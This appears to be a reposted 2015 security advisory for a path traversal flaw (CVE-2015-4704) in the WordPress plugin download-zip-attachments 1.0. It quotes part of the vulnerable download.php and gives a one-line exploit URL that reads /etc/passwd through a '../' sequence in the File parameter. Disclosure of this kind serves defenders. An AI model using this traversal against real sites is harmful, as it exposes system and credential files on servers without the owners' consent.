Title: Remote file download vulnerability in download-zip-attachments v1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-10 Download Site: https://wordpress.org/plugins/download-zip-attachments/ Vendor: rivenvirus Vendor Notified: 2015-06-15 Vendor Contact: https://profiles.wordpress.org/rivenvirus/ Advisory: http://www.vapid.dhs.org/advisory.php?v=129 Description: Download all attachments from the post into a zip file. Vulnerability: from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory. forceDownload($tmp_location,false); unlink($tmp_location); exit; } CVEID: 2015-4704 OSVDB: Exploit Code: • http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd # Iranian Exploit DataBase = http://IeDb.Ir [2015-07-02]